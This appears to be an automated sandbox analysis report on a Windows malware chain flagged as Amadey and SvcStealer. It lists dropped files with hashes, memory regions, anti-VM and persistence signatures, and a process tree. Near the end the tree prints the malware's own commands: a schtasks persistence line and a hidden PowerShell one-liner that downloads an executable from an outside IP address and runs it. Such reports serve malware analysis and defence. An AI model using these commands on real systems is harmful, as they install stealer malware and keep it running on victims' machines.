memory/2460-65-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2460-59-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2460-57-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2460-53-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2460-63-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2460-61-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2460-55-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2460-72-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1936-76-0x0000000000F00000-0x000000000139F000-memory.dmp

memory/1936-77-0x0000000000F00000-0x000000000139F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe

MD5 9dadf2f796cd4500647ab74f072fd519
SHA1 92b6c95a6ed1e120488bd28ac74274e874f6e740
SHA256 e5f73330a51f34981205988aa6bbd82797a8d2d1e2ef1a605aa90baa3a806d76
SHA512 fd9f14321805f6bfef8fa2c81e11c5c96a7246acbc70fb9c86e6a59d9e650353231ddca0c30d3c0db69cbee1c219c5ca416a6f9f691edeebbec114e997fc574d

memory/1936-93-0x0000000006A00000-0x0000000006EAC000-memory.dmp

memory/1936-94-0x0000000006A00000-0x0000000006EAC000-memory.dmp

memory/2196-95-0x0000000000260000-0x000000000070C000-memory.dmp

memory/1936-124-0x0000000000F00000-0x000000000139F000-memory.dmp

memory/1936-125-0x0000000006A00000-0x0000000006EAC000-memory.dmp

memory/1936-126-0x0000000006A00000-0x0000000006EAC000-memory.dmp

memory/2196-127-0x0000000000260000-0x000000000070C000-memory.dmp

memory/2196-129-0x0000000000260000-0x000000000070C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe

MD5 001d7acad697c62d8a2bd742c4955c26
SHA1 840216756261f1369511b1fd112576b3543508f7
SHA256 de53f6f359af6ccc361faf2aa74690c9575b987a01f1250a6eb042cf9d4ea4af
SHA512 f06039d1d7ad28a04877e4eabb6fb7a5137a0040b8c316bee502bce6c68058bfe62db9480674bb69c9aeabae34304adeeff86dc3a8427929d00a842d2f2e80eb

\Windows\Temp\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe

MD5 eff9e9d84badf4b9d4c73155d743b756
SHA1 fd0ad0c927617a3f7b7e1df2f5726259034586af
SHA256 d61ef1bfa73bd5b013066d86f1c41e33bb396fc547cf5ab7191f56cc7b463aad
SHA512 0006273c86e8130e06e705a2be46c3433c0d1b34463123354c1857ebf88503d6e7e90602dc40960351baa03155074f8c5834b251be9da90fd95b10e498a98a19

memory/1936-153-0x0000000000F00000-0x000000000139F000-memory.dmp

\Windows\Temp\{E3B35B7F-5DCC-4ADC-B8CE-BC66E8720123}\.ba\Quadrisyllable.dll

MD5 a1e561bc201a14277dfc3bf20d1a6cd7
SHA1 1895fd97fb75ad6b59fc6d2222cf36b7dc608b29
SHA256 7ae39cb5cd14a875af3e43df4a309d6a7a44c0339c413bf21b0300c84e35b66c
SHA512 aaa4e7350094dc7574e5f18ce619f48a45062674353f0f2a340a1fea0055c7961a9b257455d8ea877d739635e3444df08f049484f48fa9729d8fb1667374cf3c

\Windows\Temp\{E3B35B7F-5DCC-4ADC-B8CE-BC66E8720123}\.ba\WiseTurbo.exe

MD5 1f166f5c76eb155d44dd1bf160f37a6a
SHA1 cd6f7aa931d3193023f2e23a1f2716516ca3708c
SHA256 2d13424b09ba004135a26ccd60b64cdd6917d80ce43070cbc114569eae608588
SHA512 38ad8f1308fe1aae3ddf7dbc3b1c5442663571137390b3e31e2527b8fec70e7266b06df295df0c411fcc500424022f274fd467d36040def2e1a4feff88c749b7

memory/1864-176-0x0000000000400000-0x0000000000D48000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe

MD5 30c1a6337089e68b975438caebc8f497
SHA1 2cf2324672cf72b9bc1869633f3bf6904bb61011
SHA256 db15e9537c66a283d59f45e262018c45ef3fc5416b292b2c5269f4f9a4f10017
SHA512 be8f68704c02b41bddbd94382d30197b13f68c783d041a077b35579c1a791a82bc68d99f828eb3b09c859237256791dd2d1c39eacf4e09ec2bd3f2aa6b54a484

memory/1936-191-0x00000000063E0000-0x00000000066F1000-memory.dmp

memory/1952-194-0x00000000000F0000-0x0000000000401000-memory.dmp

memory/1936-192-0x00000000063E0000-0x00000000066F1000-memory.dmp

memory/1936-197-0x0000000000F00000-0x000000000139F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe

MD5 2bb133c52b30e2b6b3608fdc5e7d7a22
SHA1 fcb19512b31d9ece1bbe637fe18f8caf257f0a00
SHA256 b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630
SHA512 73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f

memory/1936-217-0x00000000063E0000-0x00000000066F1000-memory.dmp

memory/1936-218-0x00000000063E0000-0x00000000066F1000-memory.dmp

memory/1952-219-0x00000000000F0000-0x0000000000401000-memory.dmp

memory/1936-220-0x0000000000F00000-0x000000000139F000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\Local\Temp\TarAF0B.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

memory/1936-362-0x0000000000F00000-0x000000000139F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe

MD5 7ff72f21d83d3abdc706781fb3224111
SHA1 3bfbe059b8e491bde4919fb29afa84d4ea1c0fa8
SHA256 0c54843666a464f185c97a7693a91eb328827a900717e414357b897bd2630fea
SHA512 dbb3c7b618bc2c80dae90ff902100d3902ddffe5705cf0c648b8b3f702fd8814b9cf66490e3260e09d36c1ce57bfc05d3f9bb0fc089c5ec7c553eb8a94d3320d

memory/1936-376-0x0000000000F00000-0x000000000139F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe

MD5 971c0e70de5bb3de0c9911cf96d11743
SHA1 43badfc19a7e07671817cf05b39bc28a6c22e122
SHA256 67c9bb968cd0de2bfb2c24b00cfb2b98ac7403135ea47d98961652518584e45d
SHA512 a46523d8c71c0df25a043e2250ee1b6792e147314ec2097870a7972c892fd1a2022994f10823dadf54f161d11e808251b85a18efb9db9450d97af4b2f173f3c2

memory/2808-388-0x000000013FC30000-0x000000013FDDE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe

MD5 6006ae409307acc35ca6d0926b0f8685
SHA1 abd6c5a44730270ae9f2fce698c0f5d2594eac2f
SHA256 a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b
SHA512 b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718

memory/1936-404-0x0000000006A00000-0x0000000006E9B000-memory.dmp

memory/1936-403-0x0000000006A00000-0x0000000006E9B000-memory.dmp

memory/2824-406-0x00000000010F0000-0x000000000158B000-memory.dmp

memory/1936-411-0x0000000000F00000-0x000000000139F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe

MD5 3babce4f85902c7bcfde22e222508c4e
SHA1 4898ae5c075322b47ab2f512b5463ee6116d98f7
SHA256 06b678b55cb81e6999b25903def2ac02336dc6c9ff3cd6afdaafffd55e2e5302
SHA512 f8687729c8931579f8120f6451f669726f115123c10a7c5ce6d9a24746940153efcf7e33b719e8f543f9b4316db485633272943f462bf948b4044f234795d629

memory/2824-424-0x00000000010F0000-0x000000000158B000-memory.dmp

memory/1936-425-0x0000000006A00000-0x0000000006E9B000-memory.dmp

memory/1936-426-0x0000000006A00000-0x0000000006E9B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe

MD5 19668940080169c70b830bed8c390783
SHA1 5e6b72e52abc7d221d512111e39cbdd3f2ad40c1
SHA256 cdbc641b8c23b5699f899b408394ecfc946af9ac7a38c5d44c78a4a938e7b02c
SHA512 c322eba01ff4544b8077ec400f15ecffd3b66f89e0e0e26946224771c1ffb9c687ff4adc2e0a5e6b119766b3c8300971cfc2c990ff48346d9d3d514ab5d4bed2

memory/880-440-0x000000013F390000-0x000000013F42F000-memory.dmp

memory/1936-439-0x0000000005400000-0x000000000549F000-memory.dmp

memory/1936-438-0x0000000005400000-0x000000000549F000-memory.dmp

memory/1208-441-0x0000000003E30000-0x0000000003ED5000-memory.dmp

memory/1208-443-0x0000000003E30000-0x0000000003ED5000-memory.dmp

memory/1208-447-0x0000000003E30000-0x0000000003ED5000-memory.dmp

memory/880-446-0x000000013F390000-0x000000013F42F000-memory.dmp

memory/1936-448-0x0000000000F00000-0x000000000139F000-memory.dmp

memory/1936-449-0x0000000005400000-0x000000000549F000-memory.dmp

memory/1936-450-0x0000000005400000-0x000000000549F000-memory.dmp

memory/1580-452-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1936-453-0x0000000000F00000-0x000000000139F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe

MD5 e82c4c3f7a2994eeecc1f81a5e4a4180
SHA1 660820f778073332dcd5ec446d2fcf00de887abd
SHA256 11eec5d71c7fadae9d7176448d8fff3de44ec8d3b4df86f0eca59e06adf202d3
SHA512 4d3e42e68b9fa6330edfee677ad55ae24964c33d6fd2d25ba6c2876d80f8d9cbc999c6e27192ce58a45559d00b3c0bc71ddbee1ad8d6fd7083b705ef5cf84d76

C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe

MD5 02579a797e919dcaf5758fbcbe34b093
SHA1 7668fff0888f4c7ad7a83b24f8c6d4009c10e534
SHA256 0a63a310dfc4ce680c96f72f5b9c9559f9e6d9c3d99f48c8782ee43c56a8728c
SHA512 2b99b620ca06f03a1924c0ab2feef96142df6ff16558d30c37e8b3e5602e5d5b2ecd4e7bd3b4499ef64a0eb32cb136821442e79b3aa66caf42467c749116e5f5

memory/1936-554-0x0000000000F00000-0x000000000139F000-memory.dmp

C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe

MD5 f53198e8b444658cf7134f5ccb466a98
SHA1 0283e56ed7201eecfc7dad30cc6f3f30d677be66
SHA256 936004bbb9d3c4763c0e36cc887b21315ae6c2d55c366cb3b3390d480b827107
SHA512 ee40f63f7b75cc1b55d11c56c25086d2d66ae86a3f65326d5a75cf0f2fac94ebee622cd4844b4f6468b2bfd011ab80558f41e1b62d2a7864b0ce7f61d3bdcf09

memory/2300-567-0x00000000041E0000-0x0000000004603000-memory.dmp

memory/2372-569-0x0000000000400000-0x0000000000823000-memory.dmp

memory/2300-568-0x00000000041E0000-0x0000000004603000-memory.dmp

memory/2336-572-0x0000000000170000-0x00000000001D5000-memory.dmp

memory/1936-577-0x0000000000F00000-0x000000000139F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe

MD5 dab2bc3868e73dd0aab2a5b4853d9583
SHA1 3dadfc676570fc26fc2406d948f7a6d4834a6e2c
SHA256 388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb
SHA512 3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8

memory/1936-590-0x0000000006A00000-0x00000000070EE000-memory.dmp

memory/1936-591-0x0000000006A00000-0x00000000070EE000-memory.dmp

memory/1824-592-0x0000000000970000-0x000000000105E000-memory.dmp

memory/2300-593-0x00000000041E0000-0x0000000004603000-memory.dmp

memory/2300-594-0x00000000041E0000-0x0000000004603000-memory.dmp

memory/2372-595-0x0000000000400000-0x0000000000823000-memory.dmp

memory/2372-596-0x0000000000400000-0x0000000000823000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe

MD5 22892b8303fa56f4b584a04c09d508d8
SHA1 e1d65daaf338663006014f7d86eea5aebf142134
SHA256 87618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f
SHA512 852dcc1470f33bc601a814f61a37c1f5a10071ff3354f101be0ef9aa5ac62b4433a732d02acd4247c2a1819fef9adef7dd6722ee8eb9e8501bac033eb877c744

memory/1936-614-0x0000000000F00000-0x000000000139F000-memory.dmp

memory/1824-615-0x0000000000970000-0x000000000105E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10097710101\6eaad46262.exe

MD5 da3a7687a7f215bbbc93fe62e0afa1ea
SHA1 ee56166cf511655e53b4bbd796247c9810037476
SHA256 231b4d3c2b060b288878d7c28fb536c22f3844a54bf003eaf3b0da4808ffd63d
SHA512 374c8ecdfbd339f0064c9c799ff428086e49e82c053ddcb25b3a84c850ad6c1fa009f8833804330e8c16c489088496dbbdc74f6ee6970be4f0e2e996ed2cd75a

memory/1696-744-0x0000000001170000-0x000000000160F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10097720121\am_no.cmd

MD5 cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1 b0db8b540841091f32a91fd8b7abcd81d9632802
SHA256 5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512 ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

memory/2372-759-0x0000000000400000-0x0000000000823000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YYMSUYSSQ3CAKYLT6H5V.temp

MD5 29c618e15d21bc79ac7d3b3af1291cef
SHA1 372437f7e7ffa08dc419ec8caef214063e257107
SHA256 1562cc7e2bb4afa829250ff827198b5490f32ea8da9264a08c8e38fe66ce9e45
SHA512 26450f65deed7c371c78c4864b7f4571e8f354c258469c2a8cd6c107e5a5dd8f1e0d06bbf1cb3b6af616d8efb8fe7efac479ec5204d68a26da9fa91526a740ef

memory/1936-831-0x0000000000F00000-0x000000000139F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe

MD5 77c8daa35f8fa536031bca64e567107b
SHA1 0524411a8f30adf2b1d95c071eaa4ff900c9b702
SHA256 d0c87ac8cb00fd5d5aedbdeb6c747327969ae5ba1d031b902697ac5a9aa5fb02
SHA512 dbcc132580a51abc93a36cf1303a5139937a3e556902c28f516185d940b7a49217f4dd50ccad92a763b5e1e9563b963bed2d713fb45497c56f93bba59cb0bedd

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-05 03:56

Reported

2025-03-05 03:57

Platform

win10v2004-20250217-en

Max time kernel

34s

Max time network

46s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detects SvcStealer Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SvcStealer, Diamotrix

stealer downloader svcstealer

Svcstealer family

svcstealer

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cebafffffcbc = "\"C:\\ProgramData\\cebafffffcbc.exe\"" C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3436 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe C:\Windows\SysWOW64\cmd.exe
PID 3436 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe C:\Windows\SysWOW64\cmd.exe
PID 3436 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe C:\Windows\SysWOW64\cmd.exe
PID 3436 wrote to memory of 4820 N/A C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe C:\Windows\SysWOW64\mshta.exe
PID 3436 wrote to memory of 4820 N/A C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe C:\Windows\SysWOW64\mshta.exe
PID 3436 wrote to memory of 4820 N/A C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe C:\Windows\SysWOW64\mshta.exe
PID 2244 wrote to memory of 432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2244 wrote to memory of 432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2244 wrote to memory of 432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4820 wrote to memory of 4824 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4820 wrote to memory of 4824 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4820 wrote to memory of 4824 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 1244 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE
PID 4824 wrote to memory of 1244 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE
PID 4824 wrote to memory of 1244 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE
PID 1244 wrote to memory of 4328 N/A C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1244 wrote to memory of 4328 N/A C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1244 wrote to memory of 4328 N/A C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 4328 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe
PID 4328 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe
PID 1624 wrote to memory of 3424 N/A C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe C:\Windows\Explorer.EXE
PID 4328 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe
PID 4328 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe
PID 4328 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe
PID 4328 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe
PID 4328 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe
PID 4328 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe
PID 4656 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 4656 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 4656 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe

"C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn EwXBGmaLpCK /tr "mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn EwXBGmaLpCK /tr "mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

